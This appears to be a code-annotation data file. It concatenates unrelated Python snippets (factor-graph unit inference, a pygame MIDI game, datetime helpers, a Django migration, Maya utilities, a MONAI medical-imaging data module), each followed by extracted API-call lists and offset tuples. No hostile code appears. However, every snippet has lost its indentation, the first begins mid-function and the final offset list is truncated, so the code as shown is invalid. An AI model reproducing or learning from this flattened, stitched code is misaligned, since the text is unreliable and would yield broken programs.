for v, p in pgmvar2proba.items():
if v.name in self.pgmvar2pred:
(token, name, u) = self.pgmvar2pred[v.name]
#print '%s: %s = %s = %.4f' % (v.name, name, unit, 1.0-p)
if (token, name) in var2unitproba:
var2unitproba[(token, name)].append((unit, 1.0-p))
else:
var2unitproba[(token, name)] = [(unit, 1.0-p)]
#print '---------------------' + '\n'
for v in var2unitproba:
var2unitproba[v].sort(key=itemgetter(1), reverse=True)
if (var2unitproba[v][0][1] == 0.5):
continue
if self.SHOULD_PRINT_VARIABLE_TYPES:
print('%s:\n%s\n' % (v[1], var2unitproba[v]))
con.variable2unitproba = var2unitproba
#con.reset_constraints()
return var2unitproba
def prepare(self, fg_filename, unit):
if self.SHOULD_USE_CONSTRAINT_SCOPING and self.con_scoper.constraint_scope_list:
self.ENABLE_SCOPER = True
player = PGMPlayer(fg_filename)
self.process_nm_constraints(player, unit)
self.process_cu_constraints(player, unit)
self.process_df_constraints(player, unit)
self.process_cf_constraints(player, unit)
self.process_ks_constraints(player, unit)
return player
def process_nm_constraints(self, pgm_player, unit):
for var, nm_con in con.naming_constraints.items():
(lt, lname, unitprobalist) = nm_con
var = con.variables.get((lt.variable, lname))
if var:
nv = 'n'+ str(var)
pv = 'p'+ str(var)
p = 0.0
for (un, pr) in unitprobalist:
if (un == unit):
p = pr
break
pgm_player.add_factor(left=[], right=[nv],
states=[0, 1],
proba=p,
comment=nv + ' = 1')
pgm_player.add_factor(left=[nv], right=[pv],
states=[1, 0, 1, 1],
proba=0.7,
comment=nv + ' -> ' + pv)
#print nv + ': (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
#print nv + ' -> ' + pv
if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv
def process_cu_constraints(self, pgm_player, unit):
for var, cu_con in con.computed_unit_constraints.items():
(lt, lname, units, isKnown) = cu_con[0]
var = con.variables.get((lt.variable, lname))
if var:
cv = 'c'+ str(var)
pv = 'p'+ str(var)
p = 0.0
p_fwd = 0.95 if con.found_ros_units else 0.7
no_factor = False
for (t, n, un, isKnown) in cu_con:
if self.ENABLE_SCOPER and self.con_scoper.should_exclude_constraint([t]):
continue
if con.should_exclude_constraint((t, n, un, isKnown)):
no_factor = True
continue
if (unit in un):
p = 1.0 if isKnown else 0.8
if isKnown:
break
if no_factor and p == 0.0:
continue
pgm_player.add_factor(left=[], right=[cv],
states=[0, 1],
proba=p,
comment=cv + ' = 1')
pgm_player.add_factor(left=[cv], right=[pv],
states=[1, 0, 1, 1],
proba=p_fwd,
comment=cv + ' -> ' + pv)
#print cv + ' = 1: (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
#print cv + ' -> ' + pv
if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv
for (lt, lname, un, isKnown) in con.derived_cu_constraints:
var = con.variables.get((lt.variable, lname))
if var:
cv = 'c'+ str(var)
pv = 'p'+ str(var)
p = 0.0
p_fwd = 0.95 if con.found_ros_units else 0.7
if (unit == un):
p = 1.0 if isKnown else 0.8
pgm_player.add_factor(left=[], right=[cv],
states=[0, 1],
proba=p,
comment=cv + ' = 1')
pgm_player.add_factor(left=[cv], right=[pv],
states=[1, 0, 1, 1],
proba=p_fwd,
comment=cv + ' -> ' + pv)
#print cv + ' = 1: (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
#print cv + ' -> ' + pv
if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv
def process_df_constraints(self, pgm_player, unit):
for (lt, lname, rt, rname, df_type) in con.df_constraints:
if self.ENABLE_SCOPER and self.con_scoper.should_exclude_constraint([lt, rt]):
continue
var1 = con.variables.get((lt.variable, lname))
var2 = con.variables.get((rt.variable, rname))
if var1 and var2 and (var1 != var2):
pv1 = 'p'+ str(var1)
pv2 = 'p'+ str(var2)
pgm_player.add_factor(left=[pv1], right=[pv2],
states=[1, 0, 1, 1],
proba=0.95,
comment=pv1 + ' -> ' + pv2)
pgm_player.add_factor(left=[pv2], right=[pv1],
states=[1, 0, 1, 1],
proba=0.95,
comment=pv2 + ' -> ' + pv1)
#print pv1 + ' -> ' + pv2
#print pv2 + ' -> ' + pv1
if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv1
if (rt.variable, rname, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(rt.variable, rname, str(unit))] = pv2
else:
if lt.isKnown and (not rt.isKnown):
dv2 = 'd'+ str(var2)
pv2 = 'p'+ str(var2)
p = 0.95 if (lt.units[0] == unit) else 0.0
pgm_player.add_factor(left=[], right=[dv2],
states=[0, 1],
proba=p,
comment=dv2 + ' = 1')
pgm_player.add_factor(left=[dv2], right=[pv2],
states=[1, 0, 1, 1],
proba=0.95,
comment=dv2 + ' -> ' + pv2)
#print dv2 + ' = 1: (' + rname + ', ' + str(unit) + ', ' + str(p) + ')'
#print dv2 + ' -> ' + pv2
if (rt.variable, rname, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(rt.variable, rname, str(unit))] = pv2
elif rt.isKnown and (not lt.isKnown):
dv1 = 'd'+ str(var1)
pv1 = 'p'+ str(var1)
p = 0.95 if (rt.units[0] == unit) else 0.0
pgm_player.add_factor(left=[], right=[dv1],
states=[0, 1],
proba=p,
comment=dv1 + ' = 1')
pgm_player.add_factor(left=[dv1], right=[pv1],
states=[1, 0, 1, 1],
proba=0.95,
comment=dv1 + ' -> ' + pv1)
#print dv1 + ' = 1: (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
#print dv1 + ' -> ' + pv1
if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv1
def process_cf_constraints(self, pgm_player, unit):
for (t, name, units, cf_type) in con.conversion_factor_constraints:
var = con.variables.get((t.variable, name))
if var:
fv = 'f'+ str(var)
pv = 'p'+ str(var)
p = 0.0
if (units[0] == unit):
p = 0.95 if (cf_type == con.CF_3) else 0.9
pgm_player.add_factor(left=[], right=[fv],
states=[0, 1],
proba=p,
comment=fv + ' = 1')
pgm_player.add_factor(left=[fv], right=[pv],
states=[1, 0, 1, 1],
proba=0.95,
comment=fv + ' -> ' + pv)
#print fv + ' = 1: (' + name + ', ' + str(unit) + ', ' + str(p) + ')'
#print fv + ' -> ' + pv
if (t.variable, name, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(t.variable, name, str(unit))] = pv
def process_ks_constraints(self, pgm_player, unit):
for var, ks_con in con.known_symbol_constraints.items():
(token, name, units) = ks_con[0]
var = con.variables.get((token.variable, name))
if var:
kv = 'k'+ str(var)
pv = 'p'+ str(var)
p = 0.0
for (t, n, un) in ks_con:
p = 0.0
if (un[0] == unit):
p = 0.95
pgm_player.add_factor(left=[], right=[kv],
states=[0, 1],
proba=p,
comment=kv + ' = 1')
pgm_player.add_factor(left=[kv], right=[pv],
states=[1, 0, 1, 1],
proba=0.95,
comment=kv + ' -> ' + pv)
#print kv + ' = 1: (' + name + ', ' + str(unit) + ', ' + str(p) + ')'
#print kv + ' -> ' + pv
if (token.variable, name, str(unit)) not in self.pred2pgmvar:
self.pred2pgmvar[(token.variable, name, str(unit))] = pv
| [
"cps_constraints.known_symbol_constraints.items",
"cps_constraints.computed_unit_constraints.items",
"cps_constraints.variables.get",
"operator.itemgetter",
"uuid.uuid4",
"cps_constraints.naming_constraints.items",
"cps_constraints.should_exclude_constraint",
"pgm.pgmplayer.PGMPlayer",
"os.remove"
] | [((2521, 2543), 'pgm.pgmplayer.PGMPlayer', 'PGMPlayer', (['fg_filename'], {}), '(fg_filename)\n', (2530, 2543), False, 'from pgm.pgmplayer import PGMPlayer\n'), ((2911, 2941), 'cps_constraints.naming_constraints.items', 'con.naming_constraints.items', ([], {}), '()\n', (2939, 2941), True, 'import cps_constraints as con\n'), ((4160, 4197), 'cps_constraints.computed_unit_constraints.items', 'con.computed_unit_constraints.items', ([], {}), '()\n', (4195, 4197), True, 'import cps_constraints as con\n'), ((11571, 11607), 'cps_constraints.known_symbol_constraints.items', 'con.known_symbol_constraints.items', ([], {}), '()\n', (11605, 11607), True, 'import cps_constraints as con\n'), ((569, 581), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (579, 581), False, 'import uuid\n'), ((1162, 1184), 'os.remove', 'os.remove', (['fg_filename'], {}), '(fg_filename)\n', (1171, 1184), False, 'import os\n'), ((3009, 3048), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (3026, 3048), True, 'import cps_constraints as con\n'), ((4269, 4308), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (4286, 4308), True, 'import cps_constraints as con\n'), ((5898, 5937), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (5915, 5937), True, 'import cps_constraints as con\n'), ((7205, 7244), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (7222, 7244), True, 'import cps_constraints as con\n'), ((7264, 7303), 'cps_constraints.variables.get', 'con.variables.get', (['(rt.variable, rname)'], {}), '((rt.variable, rname))\n', (7281, 7303), True, 'import cps_constraints as con\n'), ((10504, 10541), 'cps_constraints.variables.get', 'con.variables.get', (['(t.variable, name)'], {}), '((t.variable, name))\n', (10521, 10541), True, 'import cps_constraints as con\n'), ((11672, 11713), 'cps_constraints.variables.get', 'con.variables.get', (['(token.variable, name)'], {}), '((token.variable, name))\n', (11689, 11713), True, 'import cps_constraints as con\n'), ((2010, 2023), 'operator.itemgetter', 'itemgetter', (['(1)'], {}), '(1)\n', (2020, 2023), False, 'from operator import itemgetter\n'), ((4719, 4769), 'cps_constraints.should_exclude_constraint', 'con.should_exclude_constraint', (['(t, n, un, isKnown)'], {}), '((t, n, un, isKnown))\n', (4748, 4769), True, 'import cps_constraints as con\n')] |
import time
import random
import pygame
import pygame.midi
import numpy as np
from typing import Tuple
__author__ = "<NAME>"
AV_SIZE = 20
WIN_X = 30 * AV_SIZE
WIN_Y = 30 * AV_SIZE
DIFF_MAX = np.sqrt(WIN_X**2 + WIN_Y**2)
def adapt_avatar_position(event, user_x_pos:int, user_y_pos:int) -> Tuple[int, int]:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
if user_x_pos >= AV_SIZE:
user_x_pos -= AV_SIZE
if event.key == pygame.K_RIGHT:
if user_x_pos < WIN_X-AV_SIZE:
user_x_pos += AV_SIZE
if event.key == pygame.K_UP:
if user_y_pos >= AV_SIZE:
user_y_pos -= AV_SIZE
if event.key == pygame.K_DOWN:
if user_y_pos < WIN_Y-AV_SIZE:
user_y_pos += AV_SIZE
return user_x_pos, user_y_pos
def calculate_difference(win_position:tuple, user_x_pos:int, user_y_pos:int):
difference = abs(win_position[0] - user_x_pos), abs(win_position[1] - user_y_pos)
return np.sqrt(np.sqrt(difference[0]**2 + difference[1]**2) / DIFF_MAX)
def main():
# setup
pygame.init()
pygame.midi.init()
player = pygame.midi.Output(0)
player.set_instrument(0)
current_note = random.randint(60,84)
window = pygame.display.set_mode((WIN_X,WIN_Y))
user_x_pos, user_y_pos = int(WIN_X/2), int(WIN_Y/2)
pos_x = [ii for ii in range(0,WIN_X-AV_SIZE,AV_SIZE)]
pos_y = [ii for ii in range(0,WIN_Y-AV_SIZE,AV_SIZE)]
win_position = (random.choice(pos_x), random.choice(pos_y))
difference = calculate_difference(win_position, user_x_pos, user_y_pos)
player.note_on(current_note, int(127*(1-difference)))
old_time = time.time()
# program loop
running = True
while running:
if win_position == (user_x_pos, user_y_pos):
window.fill((255,255,0))
else:
window.fill((255,255,255))
difference = calculate_difference(win_position, user_x_pos, user_y_pos)
pygame.draw.rect(window,(0,50,255,50),(user_x_pos,user_y_pos,AV_SIZE,AV_SIZE)) # Rect(left, top, width, height)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
user_x_pos, user_y_pos = adapt_avatar_position(event, user_x_pos, user_y_pos)
pygame.display.flip() # Documentation: Update the full display Surface to the screen
if time.time()-old_time > 1:
player.note_off(current_note)
current_note = random.randint(60,84)
player.note_on(current_note, int(127*(1-difference)))
old_time = time.time()
# teardown
del player
pygame.midi.quit()
if __name__=="__main__":
main() | [
"random.choice",
"numpy.sqrt",
"pygame.init",
"pygame.midi.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.display.flip",
"pygame.midi.init",
"pygame.draw.rect",
"pygame.midi.Output",
"time.time",
"random.randint"
] | [((200, 232), 'numpy.sqrt', 'np.sqrt', (['(WIN_X ** 2 + WIN_Y ** 2)'], {}), '(WIN_X ** 2 + WIN_Y ** 2)\n', (207, 232), True, 'import numpy as np\n'), ((1126, 1139), 'pygame.init', 'pygame.init', ([], {}), '()\n', (1137, 1139), False, 'import pygame\n'), ((1145, 1163), 'pygame.midi.init', 'pygame.midi.init', ([], {}), '()\n', (1161, 1163), False, 'import pygame\n'), ((1177, 1198), 'pygame.midi.Output', 'pygame.midi.Output', (['(0)'], {}), '(0)\n', (1195, 1198), False, 'import pygame\n'), ((1247, 1269), 'random.randint', 'random.randint', (['(60)', '(84)'], {}), '(60, 84)\n', (1261, 1269), False, 'import random\n'), ((1287, 1326), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(WIN_X, WIN_Y)'], {}), '((WIN_X, WIN_Y))\n', (1310, 1326), False, 'import pygame\n'), ((1719, 1730), 'time.time', 'time.time', ([], {}), '()\n', (1728, 1730), False, 'import time\n'), ((2705, 2723), 'pygame.midi.quit', 'pygame.midi.quit', ([], {}), '()\n', (2721, 2723), False, 'import pygame\n'), ((1520, 1540), 'random.choice', 'random.choice', (['pos_x'], {}), '(pos_x)\n', (1533, 1540), False, 'import random\n'), ((1542, 1562), 'random.choice', 'random.choice', (['pos_y'], {}), '(pos_y)\n', (1555, 1562), False, 'import random\n'), ((2022, 2112), 'pygame.draw.rect', 'pygame.draw.rect', (['window', '(0, 50, 255, 50)', '(user_x_pos, user_y_pos, AV_SIZE, AV_SIZE)'], {}), '(window, (0, 50, 255, 50), (user_x_pos, user_y_pos, AV_SIZE,\n AV_SIZE))\n', (2038, 2112), False, 'import pygame\n'), ((2158, 2176), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (2174, 2176), False, 'import pygame\n'), ((2350, 2371), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (2369, 2371), False, 'import pygame\n'), ((1039, 1087), 'numpy.sqrt', 'np.sqrt', (['(difference[0] ** 2 + difference[1] ** 2)'], {}), '(difference[0] ** 2 + difference[1] ** 2)\n', (1046, 1087), True, 'import numpy as np\n'), ((2543, 2565), 'random.randint', 'random.randint', (['(60)', '(84)'], {}), '(60, 84)\n', (2557, 2565), False, 'import random\n'), ((2654, 2665), 'time.time', 'time.time', ([], {}), '()\n', (2663, 2665), False, 'import time\n'), ((2448, 2459), 'time.time', 'time.time', ([], {}), '()\n', (2457, 2459), False, 'import time\n')] |
# coding=utf-8
from __future__ import unicode_literals, absolute_import
from datetime import datetime
from pytz import UTC
from dateutil.parser import parse
fmt = '%Y-%m-%d %H:%M:%S'
utc_fmt = "%Y-%m-%dT%H:%M:%SZ"
def get_utcnow():
at = datetime.utcnow()
at = at.replace(tzinfo=UTC)
return at
def isotime(at=None):
"""Stringify time in ISO 8601 format"""
if not at:
at = datetime.utcnow()
if not at.tzinfo: # 默认认为是UTC
at.replace(tzinfo=UTC)
at_utc = at
else: # 否则转换时区
at_utc = at.astimezone(UTC)
return at_utc.strftime(utc_fmt)
def parse_timestr(timestr):
return parse(timestr)
| [
"dateutil.parser.parse",
"datetime.datetime.utcnow"
] | [((243, 260), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (258, 260), False, 'from datetime import datetime\n'), ((639, 653), 'dateutil.parser.parse', 'parse', (['timestr'], {}), '(timestr)\n', (644, 653), False, 'from dateutil.parser import parse\n'), ((403, 420), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (418, 420), False, 'from datetime import datetime\n')] |
# Generated by Django 2.2.4 on 2020-02-08 02:22
from django.db import migrations
def move_batch_fks(apps, schema_editor):
Batch = apps.get_model("petition", "Batch")
CIPRSRecord = apps.get_model("petition", "CIPRSRecord")
for batch in Batch.objects.all():
print(f"Adding batch {batch.pk} to {batch.records.count()} records")
batch.records.update(batch=batch)
first_batch = Batch.objects.order_by("pk").first()
for record in CIPRSRecord.objects.all():
if not record.batch:
record.batch = first_batch
record.save()
class Migration(migrations.Migration):
dependencies = [
("petition", "0007_auto_20200208_0221"),
]
operations = [migrations.RunPython(move_batch_fks)]
| [
"django.db.migrations.RunPython"
] | [((721, 757), 'django.db.migrations.RunPython', 'migrations.RunPython', (['move_batch_fks'], {}), '(move_batch_fks)\n', (741, 757), False, 'from django.db import migrations\n')] |
import maya.cmds as mc
import os
import logging
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
def isNewScene():
"""
Method used to check if this is an untitled scene file.
:rtype: bool
"""
return len(mc.file(query=True, sceneName=True)) == 0
def isSaveRequired():
"""
Method used to check if the open scene file has changes that need to be saved.
:rtype: bool
"""
return mc.file(query=True, modified=True)
def currentFilePath():
"""
Convenience method used to retrieve the path of the open scene file.
:rtype: str
"""
if not isNewScene():
return os.path.normpath(mc.file(query=True, sceneName=True))
else:
return ''
def currentFilename():
"""
Convenience method used to retrieve the name of the open scene file.
:rtype: str
"""
return os.path.split(currentFilePath())[1]
def currentDirectory():
"""
Convenience method used to retrieve the directory of the open scene file.
:rtype: str
"""
return os.path.split(currentFilePath())[0]
def removeUserAttributes():
"""
Convenience method used to removed any user attributes that have carried over using fbx.
:rtype: None
"""
# Iterate through selection
#
nodeNames = mc.ls(sl=True)
for nodeName in nodeNames:
# Check if node has any user attributes
#
attrNames = mc.listAttr(nodeName, userDefined=True)
if attrNames is None:
continue
for attrName in attrNames:
log.info('Removing "%s.%s" attribute.' % (nodeName, attrName))
mc.deleteAttr('%s.%s' % (nodeName, attrName))
def unloadTurtlePlugin():
"""
Convenience method used to unload the turtle plugin from the open scene file.
:rtype: None
"""
# Check if turtle is loaded
#
isLoaded = mc.pluginInfo('Turtle', query=True, loaded=True)
if not isLoaded:
log.info('Could not locate "Turtle" in the open scene file.')
return
# Remove all node types associated with turtle
#
nodeTypes = mc.pluginInfo('Turtle', query=True, dependNode=True)
for nodeType in nodeTypes:
# List all nodes by type
#
nodeNames = mc.ls(type=nodeType)
numNodeNames = len(nodeNames)
if numNodeNames == 0:
continue
# Unlock and remove nodes
#
mc.lockNode(nodeNames, lock=False)
mc.delete(nodeNames)
# Flush undo queue
#
mc.flushUndo()
# Remove shelf from tab bar
#
if mc.shelfLayout('TURTLE', query=True, exists=True):
log.info('Removing "TURTLE" from the shelf tab!')
mc.deleteUI('TURTLE', layout=True)
# Unlock plugin
#
mc.unloadPlugin('Turtle')
def resetWindowPositions():
"""
Method used to move all of the active maya windows to the top left corner.
:rtype: None
"""
# Collect all windows
#
windowNames = mc.lsUI(windows=True)
for windowName in windowNames:
log.info('Resetting "%s" window...' % windowName)
mc.window(windowName, edit=True, topLeftCorner=[0, 0])
def resetStartupCameras():
"""
Method used to fix the startup cameras when they're thrown out of wack.
:rtype: None
"""
mc.viewSet('top', home=True)
mc.viewSet('front', home=True)
mc.viewSet('side', home=True)
| [
"logging.basicConfig",
"logging.getLogger",
"maya.cmds.delete",
"maya.cmds.ls",
"maya.cmds.window",
"maya.cmds.flushUndo",
"maya.cmds.deleteUI",
"maya.cmds.viewSet",
"maya.cmds.shelfLayout",
"maya.cmds.lsUI",
"maya.cmds.deleteAttr",
"maya.cmds.file",
"maya.cmds.unloadPlugin",
"maya.cmds.lo... | [((49, 70), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (68, 70), False, 'import logging\n'), ((77, 104), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (94, 104), False, 'import logging\n'), ((457, 491), 'maya.cmds.file', 'mc.file', ([], {'query': '(True)', 'modified': '(True)'}), '(query=True, modified=True)\n', (464, 491), True, 'import maya.cmds as mc\n'), ((1325, 1339), 'maya.cmds.ls', 'mc.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (1330, 1339), True, 'import maya.cmds as mc\n'), ((1912, 1960), 'maya.cmds.pluginInfo', 'mc.pluginInfo', (['"""Turtle"""'], {'query': '(True)', 'loaded': '(True)'}), "('Turtle', query=True, loaded=True)\n", (1925, 1960), True, 'import maya.cmds as mc\n'), ((2143, 2195), 'maya.cmds.pluginInfo', 'mc.pluginInfo', (['"""Turtle"""'], {'query': '(True)', 'dependNode': '(True)'}), "('Turtle', query=True, dependNode=True)\n", (2156, 2195), True, 'import maya.cmds as mc\n'), ((2555, 2569), 'maya.cmds.flushUndo', 'mc.flushUndo', ([], {}), '()\n', (2567, 2569), True, 'import maya.cmds as mc\n'), ((2616, 2665), 'maya.cmds.shelfLayout', 'mc.shelfLayout', (['"""TURTLE"""'], {'query': '(True)', 'exists': '(True)'}), "('TURTLE', query=True, exists=True)\n", (2630, 2665), True, 'import maya.cmds as mc\n'), ((2800, 2825), 'maya.cmds.unloadPlugin', 'mc.unloadPlugin', (['"""Turtle"""'], {}), "('Turtle')\n", (2815, 2825), True, 'import maya.cmds as mc\n'), ((3020, 3041), 'maya.cmds.lsUI', 'mc.lsUI', ([], {'windows': '(True)'}), '(windows=True)\n', (3027, 3041), True, 'import maya.cmds as mc\n'), ((3344, 3372), 'maya.cmds.viewSet', 'mc.viewSet', (['"""top"""'], {'home': '(True)'}), "('top', home=True)\n", (3354, 3372), True, 'import maya.cmds as mc\n'), ((3377, 3407), 'maya.cmds.viewSet', 'mc.viewSet', (['"""front"""'], {'home': '(True)'}), "('front', home=True)\n", (3387, 3407), True, 'import maya.cmds as mc\n'), ((3412, 3441), 'maya.cmds.viewSet', 'mc.viewSet', (['"""side"""'], {'home': '(True)'}), "('side', home=True)\n", (3422, 3441), True, 'import maya.cmds as mc\n'), ((1451, 1490), 'maya.cmds.listAttr', 'mc.listAttr', (['nodeName'], {'userDefined': '(True)'}), '(nodeName, userDefined=True)\n', (1462, 1490), True, 'import maya.cmds as mc\n'), ((2292, 2312), 'maya.cmds.ls', 'mc.ls', ([], {'type': 'nodeType'}), '(type=nodeType)\n', (2297, 2312), True, 'import maya.cmds as mc\n'), ((2457, 2491), 'maya.cmds.lockNode', 'mc.lockNode', (['nodeNames'], {'lock': '(False)'}), '(nodeNames, lock=False)\n', (2468, 2491), True, 'import maya.cmds as mc\n'), ((2500, 2520), 'maya.cmds.delete', 'mc.delete', (['nodeNames'], {}), '(nodeNames)\n', (2509, 2520), True, 'import maya.cmds as mc\n'), ((2734, 2768), 'maya.cmds.deleteUI', 'mc.deleteUI', (['"""TURTLE"""'], {'layout': '(True)'}), "('TURTLE', layout=True)\n", (2745, 2768), True, 'import maya.cmds as mc\n'), ((3145, 3199), 'maya.cmds.window', 'mc.window', (['windowName'], {'edit': '(True)', 'topLeftCorner': '[0, 0]'}), '(windowName, edit=True, topLeftCorner=[0, 0])\n', (3154, 3199), True, 'import maya.cmds as mc\n'), ((262, 297), 'maya.cmds.file', 'mc.file', ([], {'query': '(True)', 'sceneName': '(True)'}), '(query=True, sceneName=True)\n', (269, 297), True, 'import maya.cmds as mc\n'), ((682, 717), 'maya.cmds.file', 'mc.file', ([], {'query': '(True)', 'sceneName': '(True)'}), '(query=True, sceneName=True)\n', (689, 717), True, 'import maya.cmds as mc\n'), ((1668, 1713), 'maya.cmds.deleteAttr', 'mc.deleteAttr', (["('%s.%s' % (nodeName, attrName))"], {}), "('%s.%s' % (nodeName, attrName))\n", (1681, 1713), True, 'import maya.cmds as mc\n')] |
import sys
import numpy as np
import torch
from monai import transforms, data
from ..data import DataModule, ReadImaged, Renamed, Inferer
###################################
# Transform
###################################
def wmh_train_transform(
spacing=(1.0, 1.0, 1.0), spatial_size=(128, 128, 128), num_patches=1
):
train_transform = [
ReadImaged(["image", "label"]),
transforms.Lambdad("label", lambda x: (x == 1).astype(np.float32)),
transforms.AddChanneld("label"),
transforms.CropForegroundd(["image", "label"], source_key="image"),
transforms.NormalizeIntensityd("image", channel_wise=True),
transforms.Spacingd(
["image", "label"], pixdim=spacing, mode=("bilinear", "bilinear"),
),
transforms.SpatialPadd(["image", "label"], spatial_size=spatial_size),
transforms.RandCropByPosNegLabeld(
["image", "label"],
label_key="label",
spatial_size=spatial_size,
pos=1,
neg=1,
num_samples=num_patches,
image_key="image",
image_threshold=0,
),
transforms.RandAffined(
["image", "label"],
prob=0.15,
spatial_size=spatial_size,
rotate_range=[30 * np.pi / 180] * 3,
scale_range=[0.3] * 3,
mode=("bilinear", "bilinear"),
as_tensor_output=False,
),
transforms.RandFlipd(["image", "label"], prob=0.5, spatial_axis=0),
transforms.RandFlipd(["image", "label"], prob=0.5, spatial_axis=1),
transforms.RandFlipd(["image", "label"], prob=0.5, spatial_axis=2),
transforms.RandGaussianNoised("image", prob=0.15, std=0.1),
transforms.RandGaussianSmoothd(
"image",
prob=0.15,
sigma_x=(0.5, 1.5),
sigma_y=(0.5, 1.5),
sigma_z=(0.5, 1.5),
),
transforms.RandScaleIntensityd("image", prob=0.15, factors=0.3),
transforms.RandShiftIntensityd("image", prob=0.15, offsets=0.1),
transforms.RandAdjustContrastd("image", prob=0.15, gamma=(0.7, 1.5)),
transforms.AsDiscreted("label", threshold=0.5),
transforms.ToTensord(["image", "label"]),
Renamed(),
]
train_transform = transforms.Compose(train_transform)
return train_transform
def wmh_val_transform():
val_transform = [
ReadImaged(["image", "label"], allow_missing_keys=True),
transforms.Lambdad(
"label",
lambda x: (x == 1).astype(np.float32),
allow_missing_keys=True,
),
transforms.AddChanneld("label", allow_missing_keys=True),
transforms.NormalizeIntensityd(
"image", nonzero=True, channel_wise=True
),
transforms.ToTensord(["image", "label"], allow_missing_keys=True),
Renamed(),
]
val_transform = transforms.Compose(val_transform)
return val_transform
def wmh_test_transform():
return wmh_val_transform()
def wmh_vis_transform(spacing=(1.0, 1.0, 1.0)):
vis_transform = [
ReadImaged(["image", "label"], allow_missing_keys=True),
transforms.Lambdad(
"label",
lambda x: (x == 1).astype(np.float32),
allow_missing_keys=True,
),
transforms.AddChanneld("label", allow_missing_keys=True),
transforms.NormalizeIntensityd("image", channel_wise=True),
transforms.Spacingd(
keys=["image", "label"],
pixdim=spacing,
mode=("bilinear", "nearest"),
),
transforms.ToTensord(["image", "label"], allow_missing_keys=True),
Renamed(),
]
vis_transform = transforms.Compose(vis_transform)
return vis_transform
###################################
# Data module
###################################
class WMHDataModule(DataModule):
def __init__(
self,
data_properties,
spacing=(1.0, 1.0, 1.0),
spatial_size=(128, 128, 128),
num_patches=1,
num_splits=5,
split=0,
batch_size=2,
num_workers=None,
cache_num=sys.maxsize,
cache_rate=1.0,
progress=True,
copy_cache=True,
seed=42,
):
dataset_cls_params = {
"cache_num": cache_num,
"cache_rate": cache_rate,
"num_workers": num_workers,
"progress": progress,
"copy_cache": copy_cache,
}
dataset_cls = (data.CacheDataset, dataset_cls_params)
train_transform = wmh_train_transform(
spacing, spatial_size, num_patches
)
val_transform = wmh_val_transform()
test_transform = wmh_test_transform()
vis_transform = wmh_vis_transform(spacing)
super().__init__(
data_properties,
train_dataset_cls=dataset_cls,
val_dataset_cls=dataset_cls,
test_dataset_cls=dataset_cls,
train_transform=train_transform,
val_transform=val_transform,
test_transform=test_transform,
vis_transform=vis_transform,
num_splits=num_splits,
split=split,
batch_size=batch_size,
num_workers=num_workers,
seed=seed,
)
# alias
WMH = WMHDataModule
###################################
# Inference
###################################
class WMHInferer(Inferer):
def __init__(
self,
spacing=(1.0, 1.0, 1.0),
spatial_size=(128, 128, 128),
post=None,
write_dir=None,
output_dtype=None,
**kwargs,
) -> None:
# postprocessing transforms
if post == "logit":
post = transforms.Lambdad("input", lambda x: x)
output_dtype = np.float32 if output_dtype is None else output_dtype
elif post == "prob":
post = transforms.Lambdad("input", torch.sigmoid)
output_dtype = np.float32 if output_dtype is None else output_dtype
elif post == "class":
post = transforms.Lambdad("input", lambda x: x >= 0)
output_dtype = np.uint8 if output_dtype is None else output_dtype
else:
post = post
super().__init__(
spacing=spacing,
spatial_size=spatial_size,
post=post,
write_dir=write_dir,
output_dtype=output_dtype,
**kwargs,
)
| [
"monai.transforms.CropForegroundd",
"monai.transforms.RandScaleIntensityd",
"monai.transforms.NormalizeIntensityd",
"monai.transforms.RandShiftIntensityd",
"monai.transforms.RandAdjustContrastd",
"monai.transforms.Spacingd",
"monai.transforms.AddChanneld",
"monai.transforms.RandGaussianNoised",
"mon... | [((2309, 2344), 'monai.transforms.Compose', 'transforms.Compose', (['train_transform'], {}), '(train_transform)\n', (2327, 2344), False, 'from monai import transforms, data\n'), ((2924, 2957), 'monai.transforms.Compose', 'transforms.Compose', (['val_transform'], {}), '(val_transform)\n', (2942, 2957), False, 'from monai import transforms, data\n'), ((3728, 3761), 'monai.transforms.Compose', 'transforms.Compose', (['vis_transform'], {}), '(vis_transform)\n', (3746, 3761), False, 'from monai import transforms, data\n'), ((477, 508), 'monai.transforms.AddChanneld', 'transforms.AddChanneld', (['"""label"""'], {}), "('label')\n", (499, 508), False, 'from monai import transforms, data\n'), ((518, 584), 'monai.transforms.CropForegroundd', 'transforms.CropForegroundd', (["['image', 'label']"], {'source_key': '"""image"""'}), "(['image', 'label'], source_key='image')\n", (544, 584), False, 'from monai import transforms, data\n'), ((594, 